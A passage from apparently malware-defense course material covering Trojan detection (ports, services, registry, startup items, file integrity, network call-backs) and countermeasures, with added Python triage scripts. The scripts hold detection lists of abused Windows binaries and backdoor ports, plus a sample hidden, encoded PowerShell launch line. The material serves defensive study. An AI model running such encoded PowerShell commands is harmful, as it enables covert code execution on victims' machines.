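  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1320
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING       4412
  TCP    192.168.1.20:49712     203.0.113.7:31337      ESTABLISHED     4412
  UDP    0.0.0.0:54321          *:*                                    4412
"""


def _split_endpoint(endpoint: str) -> Tuple[str, int]:
    """'0.0.0.0:80' -> ('0.0.0.0', 80); '*:*' -> ('*', -1)."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port) if port.isdigit() else -1


def parse_netstat(text: str) -> List[dict]:
    """Turn netstat lines into dicts; the header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] not in ("TCP", "UDP"):
            continue
        _, local_port = _split_endpoint(fields[1])
        remote_host, remote_port = _split_endpoint(fields[2])
        rows.append({
            "proto": fields[0],
            "local_port": local_port,
            "remote_host": remote_host,
            "remote_port": remote_port,
            "pid": int(fields[-1]),   # UDP rows have no State column, so take the last field
        })
    return rows


def flag_suspicious(rows: List[dict]) -> List[dict]:
    """Report sockets bound to, or connected out to, a listed Trojan port."""
    findings = []
    for row in rows:
        checks = (
            ("listening", row["local_port"]),      # server side of a Trojan
            ("outbound", row["remote_port"]),      # connect-back to a handler
        )
        for direction, port in checks:
            key = (row["proto"], port)
            if key in TROJAN_PORTS:
                findings.append({
                    "pid": row["pid"],
                    "proto": row["proto"],
                    "port": port,
                    "direction": direction,
                    "remote_host": row["remote_host"],
                    "trojan": TROJAN_PORTS[key],
                    "weak": key in COMMONLY_LEGITIMATE,
                })
    return findings


def pids_to_investigate(findings: List[dict]) -> List[int]:
    """PIDs with at least one strong hit, to feed into process inspection."""
    return sorted({f["pid"] for f in findings if not f["weak"]})


if __name__ == "__main__":
    hits = flag_suspicious(parse_netstat(SAMPLE_NETSTAT))
    for h in hits:
        strength = "weak" if h["weak"] else "strong"
        print(f"[{strength}] pid {h['pid']} {h['proto']}/{h['port']} "
              f"{h['direction']} ({h['trojan']})")
    print("investigate PIDs:", pids_to_investigate(hits))
```

On the constructed input, PID 1320 on TCP/80 is reported as a weak hit (a web server would look identical), while PID 4412 collects three strong hits: a listener on 12345, an outbound connection to a remote host on 31337, and a UDP socket on 54321. That PID is the one to take into the process and service checks on the following slides.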
Scanning for Suspicious Services
• Trojans make themselves look like valid Windows services or hide their processes
• Some Trojans use PEs to inject into processes
• Processes look legitimate and help bypass firewalls
• Trojans can hide processes using rootkit methods
• Process monitoring tools can be used to identify hidden backdoors/Trojans
Services Monitoring Tools
• Process Explorer
• System Explorer
• HijackThis
• Autoruns for Windows
• KillProcess
• Security Task Manager
• Yet Another (remote) Process Monitor
• MONIT
• ESET SysInspector
• OpManager
HijackThis Example
Scanning for Suspicious Registry Entries
• Windows automatically executes instructions in certain registry sections
• Suspicious entries found when conducting a registry scan might indicate a Trojan infection
• Trojans inject instructions into certain registry sections to execute malicious actions
Registry Entries Monitoring Tools
• RegScanner
• Reg Organizer
• Registry Viewer
• Comodo Cloud Scanner
• Buster Sandbox Analyzer
• All-Seeing Eyes
• MJ Registry Watcher
• Active Registry Monitor
• Regshot
• Registry Live Watch
• Alien Registry Viewer
Scanning for Suspicious Device Drivers
• Trojans end up installed along with device drivers from unknown/untrusted sources
• The drivers are used to avoid detection
• Scan all drivers to ensure they are trusted/genuine
Device Drivers Monitoring Tools
• DriverView
• Driver Detective
• Unknown Device Identifier
• DriverGuide Toolkit
• InstalledDriversList
• Driver Magician
• Driver Reviver
• ServiWin
• Double Driver
• My Drivers
• DriverEasy
Scanning for Suspicious Windows Services
• Trojans that spawn Windows services allow attackers to control the virtual machine/send malicious instructions remotely
• Trojans rename all malicious processes to look genuine
• Trojans use rootkit techniques to manipulate certain registry keys to hide processes
Windows Services Monitoring Tools
• Windows Service Manager (SrvMan)
• SMART Utility
• Netwrix Service Monitor
• PC Services Optimizer
• ServiWin
• Windows Service Manager Tray
• AnVir Task Manager
• Process Hacker
• Free Windows Service Monitor Tool
• Nagios XI
• Service+
Scanning for Suspicious Startup Programs• Check the registry Run/RunOnce keys for startup program entries• Check automatically loaded device drivers• Check boot.ini (Windows XP and earlier) or the Boot Configuration Data store (bcdedit, Windows Vista and later)• Check automatically started Windows services• Check the Startup folder (per-user and all-users)
Suspicious Startup Program Tools• Security AutoRun• Autoruns for Windows• ActiveStartup• StartEd Pro• Startup Delayer• Startup Manager• PCTuneUp Free Startup Manager• Disable Startup• WinPatrol• Chameleon Startup Manager• Startup Booster
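The registry, service and startup-folder checks above all come down to the same question: for each autostart entry, what actually runs, from where, and is it signed? The following script is an added example written for this page (it is not part of the course material or of any of the listed tools). It takes a list of autostart entries shaped like the rows Sysinternals Autoruns exports (location, name, image path, launch string, signer) and applies the heuristics this module describes. The field layout, the heuristic lists and the sample rows are assumptions constructed for the example.

```python
"""Autostart-entry triage for registry Run keys, services and Startup-folder items.

Added example (not from the course material). Each entry mirrors the fields
Sysinternals Autoruns exports for an autostart item (location, name, image path,
launch string, signer); the heuristics and sample rows are assumptions made for
this example and would normally be tuned to the environment being examined.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class AutorunEntry:
    location: str       # registry key, service key or Startup folder the entry came from
    name: str           # value name, service name or shortcut name
    image_path: str     # executable that actually runs
    launch_string: str  # command line as stored in the autostart location
    signer: str = ""    # Authenticode signer as Autoruns reports it; "" when unsigned


# Directories an unprivileged user (or a dropper running as one) can write to.
USER_WRITABLE = re.compile(r"\\(temp|tmp|downloads|public|programdata|\$recycle\.bin)\\|^c:\\users\\", re.I)
SYSTEM_DIR = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.I)
# Signed Windows binaries routinely abused to launch payloads ("living off the land").
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "cmd.exe", "certutil.exe"}
# Names Trojans copy so that they blend into a process list.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe", "explorer.exe"}
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png|txt)\.(exe|scr|com|pif|bat|vbs|js)$", re.I)
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)


def basename(path: str) -> str:
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(entry: AutorunEntry) -> list[str]:
    """Return the heuristic reasons an entry deserves a closer look (empty list = nothing odd)."""
    image = entry.image_path.strip('"')
    name = basename(image)
    args = entry.launch_string
    reasons = []
    if USER_WRITABLE.search(image):
        reasons.append("image lives in a user-writable directory")
    if name in SYSTEM_NAMES and not SYSTEM_DIR.match(image):
        reasons.append(f"{name} mimics a system binary but is outside System32")
    if name in LOLBINS and (USER_WRITABLE.search(args) or re.search(r"https?://", args, re.I)):
        reasons.append(f"{name} is used to launch a payload from an untrusted location")
    if name == "powershell.exe" and ENCODED_PS.search(args):
        reasons.append("encoded PowerShell command line")
    if DOUBLE_EXT.search(name):
        reasons.append("double file extension")
    if not entry.signer.lower().startswith("(verified)"):
        reasons.append("image is unsigned or its signature did not verify")
    return reasons


def verdict(entry: AutorunEntry) -> str:
    """'suspicious' on any strong indicator; 'review' if the only issue is a missing signature."""
    reasons = triage(entry)
    strong = [r for r in reasons if not r.startswith("image is unsigned")]
    if strong:
        return "suspicious"
    return "review" if reasons else "ok"


def report(entries: list[AutorunEntry]) -> dict[str, str]:
    return {e.name: verdict(e) for e in entries}


# Constructed sample rows for the example; not real Autoruns output.
SAMPLE_ENTRIES = [
    AutorunEntry(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
                 r"C:\Windows\System32\SecurityHealthSystray.exe",
                 r"%windir%\system32\SecurityHealthSystray.exe", "(Verified) Microsoft Windows"),
    AutorunEntry(r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "OneDriveUpdate",
                 r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
                 r"C:\Users\alice\AppData\Local\Temp\svchost.exe -k netsvcs", ""),
    AutorunEntry(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Updater",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
                 "(Verified) Microsoft Windows"),
    AutorunEntry(r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "invoice.lnk",
                 r"C:\Users\alice\Downloads\invoice.pdf.exe", r"C:\Users\alice\Downloads\invoice.pdf.exe", ""),
    AutorunEntry(r"HKLM\SYSTEM\CurrentControlSet\Services", "wuauserv",
                 r"C:\Windows\System32\svchost.exe", r"C:\Windows\system32\svchost.exe -k netsvcs -p",
                 "(Verified) Microsoft Windows"),
]


if __name__ == "__main__":
    for e in SAMPLE_ENTRIES:
        print(f"{verdict(e):10} {e.name:16} {e.image_path}")
        for r in triage(e):
            print(f"{'':10}   - {r}")
```

Note that the signed PowerShell entry is flagged purely on its command line: a verified Microsoft signature on the image says nothing about what the launch string makes it do, which is why the triage looks at both fields rather than trusting the signer column alone.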
Scanning for Suspicious Files and Folders• Trojans generally create, replace or modify files/folders on a system• Tools to identify changes in the system include:• SIGVERIF (checks that system files carry a valid digital signature)• FCIV (computes MD5/SHA-1 hashes of files for comparison against a known-good list)• TRIPWIRE (builds a baseline of file hashes/attributes and reports what has changed since)
File and Folder Integrity Checkers• FastSum• WinMD5• Advanced CheckSum Verifier (ACSV)• Fsum Frontend• Verisys• Another File Integrity Checker (AFICK)• FileVerifier++• PA File Sight• CSP File Integrity Checker• ExactFile• OSSEC• Checksum Verifier
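What FCIV and Tripwire do at their core is take a baseline of file hashes on a known-clean system and later compare the live file system against it. The script below is an added example written for this page, not code from the course or from either tool; it implements that baseline-and-verify cycle with SHA-256 and a JSON baseline file. It assumes the baseline was taken on a clean system and stored where the machine under test cannot modify it.

```python
"""Baseline-and-verify file integrity checker in the spirit of FCIV and Tripwire.

Added example (not from the course material or either tool). build_baseline()
records a SHA-256 digest and size for every regular file under a root; verify()
re-hashes the tree and reports what was added, removed or modified. The only
assumption is that the baseline was taken on a known-clean system and stored
where the machine under test cannot alter it.
"""
import hashlib
import json
import os


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_baseline(root: str) -> dict:
    """Map each relative path under root to its digest and size.

    Timestamps are deliberately not recorded: malware routinely 'timestomps' its
    files, so only content hashes are trusted for the comparison.
    """
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order makes two baselines diffable as text
        for filename in sorted(filenames):
            full = os.path.join(dirpath, filename)
            if os.path.islink(full):  # hash real files only; a link can be repointed anywhere
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = {"sha256": sha256_file(full), "size": os.path.getsize(full)}
    return baseline


def save_baseline(baseline: dict, path: str) -> None:
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(baseline, fh, indent=1, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def verify(root: str, baseline: dict) -> dict:
    """Compare the live tree against the baseline; returns sorted lists of changes."""
    current = build_baseline(root)
    known, now = set(baseline), set(current)
    return {
        "added": sorted(now - known),
        "removed": sorted(known - now),
        "modified": sorted(p for p in known & now if current[p]["sha256"] != baseline[p]["sha256"]),
    }


def is_clean(result: dict) -> bool:
    return not any(result.values())


if __name__ == "__main__":
    import sys
    # usage: integrity.py baseline <root> <baseline.json>
    #        integrity.py verify   <root> <baseline.json>
    mode, root, store = sys.argv[1:4]
    if mode == "baseline":
        save_baseline(build_baseline(root), store)
    else:
        print(json.dumps(verify(root, load_baseline(store)), indent=1))
```

Two caveats a practitioner would add: the checker, the Python interpreter and the baseline are themselves targets, so keep the baseline off the host (or on read-only media) and record their hashes too; and a rootkit that hides files from directory listings defeats any checker run on the live system, which is why a suspect machine should be verified from trusted boot media.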
Scanning for Suspicious Network Activities• Trojans send stolen information to attackers by connecting back to a handler (command-and-control server)• Network scanners/packet sniffers can monitor traffic for connections to malicious remote addresses, unusual outbound ports and unexpected encrypted sessions• Tools like Capsa can monitor traffic, including web traffic, for suspicious activity• Capsa is a network analyzer that gives detailed information on potential Trojan activities
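On the host itself the quickest check for a call-back is to correlate the socket table with the process list: which process owns an outbound connection, where does its image live, and does every PID that owns a socket actually appear in the process list? The script below is an added example written for this page (not course material or Capsa output). It parses text in the format of `netstat -ano` and joins it with a PID-to-process table such as `Get-CimInstance Win32_Process` would give; the netstat lines, the process table, the allowlist of processes expected to talk to the Internet, the internal address ranges and the "suspect port" list are all constructed assumptions for the example.

```python
"""Triage of 'netstat -ano' output against a process list, looking for Trojan call-backs.

Added example (not from the course material). The netstat text and process table
below are constructed for the example; on a real host they would come from
'netstat -ano' and from 'Get-CimInstance Win32_Process' (or tasklist). The
allowlist of processes expected to talk to the Internet, the internal address
ranges and the suspect-port list are assumptions to tune per environment.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
EXPECTED_NET_CLIENTS = {"msedge.exe", "chrome.exe", "firefox.exe", "outlook.exe", "teams.exe"}
SUSPECT_PORTS = {4444, 1337, 31337, 6666, 6667}   # common reverse-shell/backdoor and IRC ports
USER_WRITABLE = re.compile(r"\\(temp|tmp|downloads|public|programdata)\\|^c:\\users\\", re.I)


@dataclass
class Conn:
    proto: str
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    state: str   # "" for UDP, which netstat prints without a state column
    pid: int


def split_addr(addr: str) -> tuple[str, int]:
    host, _, port = addr.rpartition(":")
    host = host.strip("[]")          # IPv6 addresses are printed as [addr]:port
    return host, int(port) if port.isdigit() else 0


def parse_netstat(text: str) -> list[Conn]:
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue  # skips the banner, blank lines and the column header
        state = parts[3] if parts[0] == "TCP" else ""
        conns.append(Conn(parts[0], *split_addr(parts[1]), *split_addr(parts[2]), state, int(parts[-1])))
    return conns


def is_internal(ip: str) -> bool:
    if ip in ("*", "0.0.0.0", "::"):
        return True
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_link_local or any(addr in net for net in INTERNAL_NETS)


def find_suspicious(conns: list[Conn], processes: dict[int, tuple[str, str]]) -> list[dict]:
    """Return one finding per socket that trips a heuristic; processes maps PID -> (name, image path)."""
    findings = []
    for c in conns:
        name, path = processes.get(c.pid, ("<none>", ""))
        reasons = []
        if c.pid not in processes:
            reasons.append("PID owns a socket but is missing from the process list (hidden process?)")
        if USER_WRITABLE.search(path):
            reasons.append("process image lives in a user-writable directory")
        if c.state == "ESTABLISHED" and not is_internal(c.remote_ip):
            if name.lower() not in EXPECTED_NET_CLIENTS:
                reasons.append(f"{name} has an outbound connection to external host {c.remote_ip}")
            if c.remote_port in SUSPECT_PORTS:
                reasons.append(f"remote port {c.remote_port} is a common backdoor/IRC port")
        if c.state == "LISTENING" and c.local_port in SUSPECT_PORTS:
            reasons.append(f"listening on backdoor port {c.local_port}")
        if reasons:
            findings.append({"pid": c.pid, "process": name,
                             "conn": f"{c.proto} {c.local_ip}:{c.local_port} -> {c.remote_ip}:{c.remote_port} {c.state}".strip(),
                             "reasons": reasons})
    return findings


# Constructed sample data for the example (netstat -ano layout; 198.51.100.0/24 and
# 203.0.113.0/24 are documentation ranges standing in for Internet addresses).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       6644
  TCP    192.168.1.20:49712     203.0.113.45:443       ESTABLISHED     5120
  TCP    192.168.1.20:49740     198.51.100.7:4444      ESTABLISHED     6644
  TCP    192.168.1.20:49801     192.168.1.5:445        ESTABLISHED     4
  TCP    192.168.1.20:49850     198.51.100.9:443       ESTABLISHED     7120
  UDP    0.0.0.0:5353           *:*                                    1204
"""
SAMPLE_PROCESSES = {
    4: ("System", ""),
    948: ("svchost.exe", r"C:\Windows\System32\svchost.exe"),
    1204: ("svchost.exe", r"C:\Windows\System32\svchost.exe"),
    5120: ("msedge.exe", r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"),
    6644: ("svchost.exe", r"C:\Users\alice\AppData\Local\Temp\svchost.exe"),
    # PID 7120 is deliberately absent: it owns a socket but is hidden from the process list.
}


if __name__ == "__main__":
    for f in find_suspicious(parse_netstat(SAMPLE_NETSTAT), SAMPLE_PROCESSES):
        print(f"PID {f['pid']} ({f['process']}): {f['conn']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

The hidden-PID case is the one worth remembering: a rootkit can remove a process from the process list that Task Manager and tasklist read, but the socket it owns still shows up in the TCP/IP stack's connection table with its PID, and the mismatch between the two views is the tell.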
6.10 Malware Countermeasures
Trojan Countermeasures• Do not open email attachments from unknown senders• Ensure patches/security updates are installed• Ensure unnecessary ports at host firewall are blocked• Conduct antivirus scan of all DVDs/CDs• Do not accept programs via IM• Ensure desktop permissions are restricted
Trojan Countermeasures (cont’d)• Ensure weak default configuration settings are hardened and unused functions are disabled• Do not blindly type commands or run pre-made scripts/programs• Ensure internal traffic is monitored for unexpected encrypted traffic/unusual ports• Ensure the file integrity of each workstation is consistently managed• Do not download/execute apps from untrusted sources• Regularly run host-based anti-virus, intrusion detection, and firewall software
Backdoor Countermeasures• The majority of commercial antivirus software can scan for/detect known backdoor programs• Ensure users know not to install apps from untrusted sources• Ensure anti-virus tools are used to identify/eliminate backdoor programs
Virus and Worms Countermeasures• Ensure anti-virus software that identifies/eliminates infections as soon as they appear is installed• Follow the organization’s rules when downloading programs/files from the Internet• Ensure an anti-virus policy is in place and all staff are aware of it• Do not open attachments from unknown senders• Ensure anti-virus software is regularly updated• Ensure regular scans of all drives are conducted• Ensure regular backups of data are taken• Check all programs/disks with updated anti-virus before using them
Virus and Worms Countermeasures (cont’d)• Ensure all executable code received by the organization is approved before use• Ensure disk cleanup, defragmentation, and a registry scanner are run weekly• Avoid booting the machine from an infected boot disk• Ensure the host firewall is turned on (available from Windows XP onward)• Keep updated on the latest virus threats• Ensure anti-spyware/adware scans are run weekly• Ensure all CDs/DVDs are checked for infection• Avoid opening files that have multiple file extensions (e.g. invoice.pdf.exe)• Turn on the popup blocker and use an Internet firewall• Take extra care with files received via IM
Anti-Trojan Software• TrojanHunter• Emsisoft Anti-Malware• Anti-Malware BOClean• Anti Hacker• XoftSpySE• SPYWAREfighter• Malwarebytes Anti-Malware Premium• SUPERAntiSpyware• Trojan Remover• Twister Antivirus• STOPzilla AntiMalware• ZeroSpyware
Antivirus Tools• Immunet• AVG Antivirus• BitDefender• Kaspersky Anti-Virus• Trend Micro Titanium Maximum Security• Norton AntiVirus• F-Secure Anti-Virus• avast! Pro Antivirus 2014• McAfee AntiVirus Plus 2014• ESET Smart Security 7• Total Defense Internet Security Suite
6.11 Malware Penetration Testing
Pen Testing for Trojans and Backdoors• Scanning for open ports• Scanning for processes that are running• Scanning for entries in the registry• Scanning for installation of device drivers• Scanning for Windows services• Scanning for startup programs• Scanning for files/folders• Scanning for activities on the network• Scanning for O/S file modification• Running a Trojan scanner• Documenting findings
Pen Testing for Trojans and Backdoors (cont’d)• When a Trojan is found:• Isolate the machine from the network• Update and run anti-virus, or use another anti-virus program
Pen Testing for Viruses• Testing for suspicious behavior in a system• Is anti-virus installed?• Is anti-virus updated?• Is real-time scanning enabled?• Scanning for running processes• Scanning for changes to registry entries• Checking Windows services• Checking startup programs• Checking integrity of files/folders• Checking modification of O/S files
Pen Testing for Viruses (cont’d)• When suspicious activity is found:• Ensure the system is isolated• Run anti-virus in safe mode• When a virus is found:• Install a different anti-virus program• Scan the system a second time• When the virus is still found (or cannot be removed):• Format the system and reinstall a clean copy of the O/S• Document findings
Malware Threats Review
• Malware is malicious software that disables/damages computer systems
• A Trojan is a program that hides malicious code inside seemingly normal data/programming
• A Trojan executable is bound to .EXE apps using a wrapper
• An exploit/crimeware kit delivers exploits/payload to a target system
• A virus is a self-replicating program that attaches itself to another file
• A worm is a more advanced type of self-replicating malware that does not need to be attached to another file and spreads over the network on its own
• Viruses are categorized based on what/how they infect
• The best defense against Trojans/viruses is awareness/prevention
• Use anti-Trojan/anti-virus tools to identify/eliminate Trojans/viruses
Lab 6: Malware Threats